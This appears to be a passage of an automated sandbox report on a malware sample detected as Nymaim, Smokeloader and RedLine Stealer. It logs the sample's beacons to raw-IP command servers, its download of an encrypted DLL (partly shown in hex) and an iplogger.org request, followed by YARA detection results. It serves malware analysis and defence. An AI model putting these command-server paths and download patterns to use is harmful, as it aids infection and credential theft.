                                                          3192.168.2.349727208.67.104.9780C:\Users\user\Desktop\file.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Oct 3, 2022 17:33:56.948786020 CEST4929OUTGET /powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1
                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                          User-Agent: 1
                                                          Host: 208.67.104.97
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          Oct 3, 2022 17:33:58.858678102 CEST4930INHTTP/1.1 200 OK
                                                          Date: Mon, 03 Oct 2022 15:33:56 GMT
                                                          Server: Apache/2.4.41 (Ubuntu)
                                                          Content-Length: 1
                                                          Keep-Alive: timeout=5, max=100
                                                          Connection: Keep-Alive
                                                          Content-Type: text/html; charset=UTF-8
                                                          Data Raw: 30
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          4192.168.2.349728107.182.129.23580C:\Users\user\Desktop\file.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Oct 3, 2022 17:33:58.934958935 CEST4930OUTGET /storage/ping.php HTTP/1.1
                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                          User-Agent: 0
                                                          Host: 107.182.129.235
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          Oct 3, 2022 17:33:58.962400913 CEST4931INHTTP/1.1 200 OK
                                                          Date: Mon, 03 Oct 2022 15:33:58 GMT
                                                          Server: Apache/2.4.41 (Ubuntu)
                                                          Content-Length: 17
                                                          Keep-Alive: timeout=5, max=100
                                                          Connection: Keep-Alive
                                                          Content-Type: text/html; charset=UTF-8
                                                          Data Raw: 55 77 55 6f 6f 6f 49 49 72 77 67 68 32 34 75 75 55
                                                          Data Ascii: UwUoooIIrwgh24uuU
                                                          Oct 3, 2022 17:33:59.005754948 CEST4931OUTGET /storage/extension.php HTTP/1.1
                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                          User-Agent: 1
                                                          Host: 107.182.129.235
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          Oct 3, 2022 17:33:59.033391953 CEST4933INHTTP/1.1 200 OK
                                                          Date: Mon, 03 Oct 2022 15:33:59 GMT
                                                          Server: Apache/2.4.41 (Ubuntu)
                                                          Pragma: public
                                                          Expires: 0
                                                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                          Cache-Control: private
                                                          Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                                                          Content-Transfer-Encoding: binary
                                                          Content-Length: 94224
                                                          Keep-Alive: timeout=5, max=99
                                                          Connection: Keep-Alive
                                                          Content-Type: application/octet-stream
                                                          Data Raw: f9 f1 a9 b8 8b 6d 69 b2 02 e6 7d 3b a6 18 dc 46 22 cd 29 c1 54 8d 11 27 4b 3b 1b ff ec e2 4f bb 59 30 3a cd fb c8 c6 19 33 6a e8 b1 5c 17 49 6a ea 32 52 c5 89 50 17 fc 06 dd 43 07 19 e2 71 a9 7c d1 32 a8 0e fe be ec b3 69 52 32 57 f5 46 e8 b4 ab 43 3d 4d 55 b9 a4 16 cb 8b 9e 85 48 36 99 ea f5 41 e4 94 1a 97 d3 d7 40 7f fa 4f a6 63 1a 89 89 4d 87 78 38 ce 94 d2 e4 b0 4c ae e0 2d 20 c9 88 ab 62 96 84 7c 12 43 b2 c0 e7 8e a4 5a 7d a5 77 d7 94 2e d1 6c 1a 61 cd 61 54 b4 87 c2 a5 62 72 2c 19 c8 18 36 77 23 06 6a c2 50 d9 8c 6c 69 f4 88 3d fc b4 ca 1b 0e c0 6f ac 1e b2 92 93 cf ee 53 e9 7b ab eb 52 94 a4 e6 e4 2e 94 d9 d2 35 d5 a0 15 92 ec a7 23 3b 93 d0 94 82 04 2d fb d3 f1 e8 62 2b 19 e3 8b 47 28 90 3e cb 02 51 05 b9 e0 f5 a5 69 4e 7b 90 2b 79 0c 1d d0 5a 43 e7 ae 7a 33 73 45 cd f0 ae fa 54 0d d3 32 df 4a 10 84 ce 33 bf 39 55 d6 34 26 f6 b2 50 d4 e5 c7 c7 cb d7 b0 e1 89 22 77 49 fa a4 b9 cb e0 40 cb c3 b5 ae da 78 25 3e 90 be 44 0e d5 80 27 7a 09 5e fb 01 d3 d4 5e 28 bc 07 0d a4 87 4e 43 ca 5b 5b 6b d9 0a ba c8 f0 ff 95 eb ca 9c d2 56 5d 47 f1 d2 29 65 0f 7f b4 94 bf 60 c5 c5 d4 ea b1 07 18 ee 4b 2f 4c d0 55 6c 12 19 46 1f 15 22 8a ed 38 24 16 41 64 ef fa aa e4 3a 69 b5 67 a6 f4 30 81 64 db 0f d8 5b 2e a9 cf 54 22 6c 90 55 c0 4d 00 3d 17 30 b1 b0 ef 2c de d9 2c e7 99 83 6b 75 d4 57 2c c3 d1 f7 f9 f3 37 60 51 cf 46 69 3d 77 13 f9 e3 75 f1 dc 3a 8f 97 51 2d ca 52 a0 7d 30 1c c8 eb ac 4c ba ad 82 8f bd 6e c9 0a 1c 74 a4 6e 76 c0 1f eb 06 07 7a c3 c0 18 0c 65 9e e8 49 c0 43 00 01 b3 b6 d2 39 bf 56 8c 7e 31 2b 5b 5d 06 cb 9f 37 f5 04 af 78 51 1d e7 a4 f8 12 02 f6 b0 06 24 81 4c 00 1c 6f e9 65 51 c7 86 2f c8 62 c9 82 f8 5a 96 0c e4 de c1 e4 70 5d 96 3b 69 2a 29 d1 a6 bd 96 23 b9 62 ef 14 f0 25 31 95 ea 11 0d 8c db bf ec f8 40 a0 17 82 47 ff e1 5b 02 97 d9 b7 9b a6 85 0d 2f 00 63 ca 8e 5a 19 f7 ea 08 d1 81 f4 47 95 3a 0f a1 6e 90 a8 45 d3 69 08 4f af 9c 6f af 55 1e 42 c9 50 78 d3 de b2 de 0b 31 7b 2c 61 10 da cf f3 f6 23 6b cd ad 64 6a be ed 4c 34 cc 0f d2 7d da 64 3c 95 14 a4 a8 d5 d9 49 79 79 c4 a0 4a a7 fb 66 ee 57 c4 10 2c 5e 76 56 da 41 6f d4 4b d4 22 2b 4f 58 38 21 46 a7 02 f1 59 50 8b ea bd f5 75 b6 2d e6 ed 42 69 6b eb a5 5b e2 75 05 9b c1 26 57 74 bc 84 50 af f4 7f 6d cf 00 10 8e 5e 20 c8 9a c9 6b 7e e2 01 2e a3 90 6c fe d3 6f a6 7a 4d 56 1c 21 73 2e ed b6 68 80 f0 c3 7b 0f 6e 32 3b 7a d7 d9 cc 4b db 04 3f 53 c5 93 f4 2d 96 0d f9 65 57 e0 e0 ac cf 63 dc fa f2 1b e6 2d 56 dd 62 67 ff ff 39 da 49 c5 05 67 ba 78 fa 67 cb b7 ba ef 7d c3 27 e6 35 d2 c0 28 2a 50 b3 e8 b7 93 c8 4a 23 97 18 3a b5 49 53 b4 08 44 7d 8e 76 8a 97 c3 09 ea 9d 15 6a 4b 39 03 4c 51 46 aa 0f 00
                                                          Data Ascii: mi};F")T'K;OY0:3j\Ij2RPCq|2iR2WFC=MUH6A@OcMx8L- b|CZ}w.laaTbr,6w#jPli=oS{R.5#;-b+G(>QiN{+yZCz3sET2J39U4&P"wI@x%>D'z^^(NC[[kV]G)e`K/LUlF"8$Ad:ig0d[.T"lUM=0,,kuW,7`QFi=wu:Q-R}0LntnvzeIC9V~1+[]7xQ$LoeQ/bZp];i*)#b%1@G[/cZG:nEiOoUBPx1{,a#kdjL4}d<IyyJfW,^vVAoK"+OX8!FYPu-Bik[u&WtPm^ k~.lozMV!s.h{n2;zK?S-eWc-Vbg9Igxg}'5(*PJ#:ISD}vjK9LQF


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          5192.168.2.349729171.22.30.10680C:\Users\user\Desktop\file.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Oct 3, 2022 17:33:59.198265076 CEST5031OUTGET /library.php HTTP/1.1
                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                          User-Agent: 2
                                                          Host: 171.22.30.106
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          Oct 3, 2022 17:33:59.718575001 CEST5031INHTTP/1.1 200 OK
                                                          Date: Mon, 03 Oct 2022 15:33:59 GMT
                                                          Server: Apache/2.4.41 (Ubuntu)
                                                          Content-Length: 1
                                                          Keep-Alive: timeout=5, max=100
                                                          Connection: Keep-Alive
                                                          Content-Type: text/html; charset=UTF-8
                                                          Data Raw: 30
                                                          Data Ascii: 0
                                                          Oct 3, 2022 17:34:01.759082079 CEST5036OUTGET /library.php HTTP/1.1
                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                          User-Agent: 2
                                                          Host: 171.22.30.106
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          Oct 3, 2022 17:34:02.291836023 CEST5036INHTTP/1.1 200 OK
                                                          Date: Mon, 03 Oct 2022 15:34:01 GMT
                                                          Server: Apache/2.4.41 (Ubuntu)
                                                          Content-Length: 1
                                                          Keep-Alive: timeout=5, max=99
                                                          Connection: Keep-Alive
                                                          Content-Type: text/html; charset=UTF-8
                                                          Data Raw: 30
                                                          Data Ascii: 0
                                                          Oct 3, 2022 17:34:04.333590984 CEST11728OUTGET /library.php HTTP/1.1
                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                          User-Agent: 2
                                                          Host: 171.22.30.106
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          Oct 3, 2022 17:34:04.853250027 CEST11728INHTTP/1.1 200 OK
                                                          Date: Mon, 03 Oct 2022 15:34:04 GMT
                                                          Server: Apache/2.4.41 (Ubuntu)
                                                          Content-Length: 1
                                                          Keep-Alive: timeout=5, max=98
                                                          Connection: Keep-Alive
                                                          Content-Type: text/html; charset=UTF-8
                                                          Data Raw: 30
                                                          Data Ascii: 0
                                                          Oct 3, 2022 17:34:06.938766003 CEST12497OUTGET /library.php HTTP/1.1
                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                          User-Agent: 2
                                                          Host: 171.22.30.106
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          Oct 3, 2022 17:34:07.473392963 CEST12680INHTTP/1.1 200 OK
                                                          Date: Mon, 03 Oct 2022 15:34:06 GMT
                                                          Server: Apache/2.4.41 (Ubuntu)
                                                          Content-Length: 1
                                                          Keep-Alive: timeout=5, max=97
                                                          Connection: Keep-Alive
                                                          Content-Type: text/html; charset=UTF-8
                                                          Data Raw: 30
                                                          Data Ascii: 0
                                                          Oct 3, 2022 17:34:09.590425968 CEST12680OUTGET /library.php HTTP/1.1
                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                          User-Agent: 2
                                                          Host: 171.22.30.106
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          Oct 3, 2022 17:34:10.120043039 CEST12681INHTTP/1.1 200 OK
                                                          Date: Mon, 03 Oct 2022 15:34:09 GMT
                                                          Server: Apache/2.4.41 (Ubuntu)
                                                          Content-Length: 1
                                                          Keep-Alive: timeout=5, max=96
                                                          Connection: Keep-Alive
                                                          Content-Type: text/html; charset=UTF-8
                                                          Data Raw: 30
                                                          Data Ascii: 0
                                                          Oct 3, 2022 17:34:13.025736094 CEST12682OUTGET /library.php HTTP/1.1
                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                          User-Agent: 2
                                                          Host: 171.22.30.106
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          Oct 3, 2022 17:34:13.562206984 CEST12682INHTTP/1.1 200 OK
                                                          Date: Mon, 03 Oct 2022 15:34:13 GMT
                                                          Server: Apache/2.4.41 (Ubuntu)
                                                          Content-Length: 1
                                                          Keep-Alive: timeout=5, max=95
                                                          Connection: Keep-Alive
                                                          Content-Type: text/html; charset=UTF-8
                                                          Data Raw: 30
                                                          Data Ascii: 0
                                                          Oct 3, 2022 17:34:15.658155918 CEST12683OUTGET /library.php HTTP/1.1
                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                          User-Agent: 2
                                                          Host: 171.22.30.106
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          Oct 3, 2022 17:34:16.168941021 CEST12683INHTTP/1.1 200 OK
                                                          Date: Mon, 03 Oct 2022 15:34:15 GMT
                                                          Server: Apache/2.4.41 (Ubuntu)
                                                          Content-Length: 1
                                                          Keep-Alive: timeout=5, max=94
                                                          Connection: Keep-Alive
                                                          Content-Type: text/html; charset=UTF-8
                                                          Data Raw: 30
                                                          Data Ascii: 0
                                                          Oct 3, 2022 17:34:18.206471920 CEST12683OUTGET /library.php HTTP/1.1
                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                          User-Agent: 2
                                                          Host: 171.22.30.106
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          Oct 3, 2022 17:34:18.741888046 CEST12684INHTTP/1.1 200 OK
                                                          Date: Mon, 03 Oct 2022 15:34:18 GMT
                                                          Server: Apache/2.4.41 (Ubuntu)
                                                          Content-Length: 1
                                                          Keep-Alive: timeout=5, max=93
                                                          Connection: Keep-Alive
                                                          Content-Type: text/html; charset=UTF-8
                                                          Data Raw: 30
                                                          Data Ascii: 0
                                                          Oct 3, 2022 17:34:20.784324884 CEST12684OUTGET /library.php HTTP/1.1
                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                          User-Agent: 2
                                                          Host: 171.22.30.106
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          Oct 3, 2022 17:34:21.340166092 CEST12685INHTTP/1.1 200 OK
                                                          Date: Mon, 03 Oct 2022 15:34:20 GMT
                                                          Server: Apache/2.4.41 (Ubuntu)
                                                          Content-Length: 1
                                                          Keep-Alive: timeout=5, max=92
                                                          Connection: Keep-Alive
                                                          Content-Type: text/html; charset=UTF-8
                                                          Data Raw: 30
                                                          Data Ascii: 0
                                                          Oct 3, 2022 17:34:23.377938032 CEST12685OUTGET /library.php HTTP/1.1
                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                          User-Agent: 2
                                                          Host: 171.22.30.106
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          Oct 3, 2022 17:34:23.914403915 CEST12685INHTTP/1.1 200 OK
                                                          Date: Mon, 03 Oct 2022 15:34:23 GMT
                                                          Server: Apache/2.4.41 (Ubuntu)
                                                          Content-Length: 1
                                                          Keep-Alive: timeout=5, max=91
                                                          Connection: Keep-Alive
                                                          Content-Type: text/html; charset=UTF-8
                                                          Data Raw: 30
                                                          Data Ascii: 0
                                                          Oct 3, 2022 17:34:25.975308895 CEST12686OUTGET /library.php HTTP/1.1
                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                          User-Agent: 2
                                                          Host: 171.22.30.106
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          Oct 3, 2022 17:34:26.502857924 CEST12686INHTTP/1.1 200 OK
                                                          Date: Mon, 03 Oct 2022 15:34:25 GMT
                                                          Server: Apache/2.4.41 (Ubuntu)
                                                          Content-Length: 1
                                                          Keep-Alive: timeout=5, max=90
                                                          Connection: Keep-Alive
                                                          Content-Type: text/html; charset=UTF-8
                                                          Data Raw: 30
                                                          Data Ascii: 0


                                                          HTTPS Proxied Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          0192.168.2.349723148.251.234.83443C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe
                                                          TimestampkBytes transferredDirectionData
                                                          2022-10-03 15:33:22 UTC0OUTGET /1Pz8p7 HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G973U Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36
                                                          Host: iplogger.org
                                                          Connection: Keep-Alive
                                                          2022-10-03 15:33:22 UTC0INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Mon, 03 Oct 2022 15:33:22 GMT
                                                          Content-Type: image/png
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: clhf03028ja=102.129.143.15; expires=Tue, 03-Oct-2023 15:33:22 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                          Set-Cookie: 333625791719766799=1; expires=Tue, 03-Oct-2023 15:33:22 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                          Expires: Mon, 03 Oct 2022 15:33:22 +0000
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Strict-Transport-Security: max-age=31536000
                                                          X-Frame-Options: SAMEORIGIN
                                                          2022-10-03 15:33:22 UTC0INData Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`0


                                                          Statistics

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:17:31:59
                                                          Start date:03/10/2022
                                                          Path:C:\Users\user\Desktop\file.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\Desktop\file.exe
                                                          Imagebase:0x400000
                                                          File size:238080 bytes
                                                          MD5 hash:A3B774ED5023F56970EEA0668AE65703
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.261344459.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.261344459.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.271765385.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.271765385.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.266126410.000000000078A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.265250551.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.265250551.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.307807767.000000000078A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.272012058.000000000078A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.306274144.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.306274144.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.270474734.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.270474734.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.255218236.000000000078A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.292406498.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.254552831.000000000078A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.299589881.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.299589881.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.260586728.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.260586728.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.307333691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.285914510.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.300504834.000000000078A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.306335009.000000000078A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.286527423.000000000078A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.265875582.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.254096635.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.255136448.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.255136448.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.293499241.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.284886919.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.284886919.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.299464336.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.254427333.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.254427333.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.307684554.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.307684554.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.260403586.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.270306154.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.271549614.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.261149123.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.261493549.000000000078A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.270666653.000000000078A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.260670257.000000000078A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
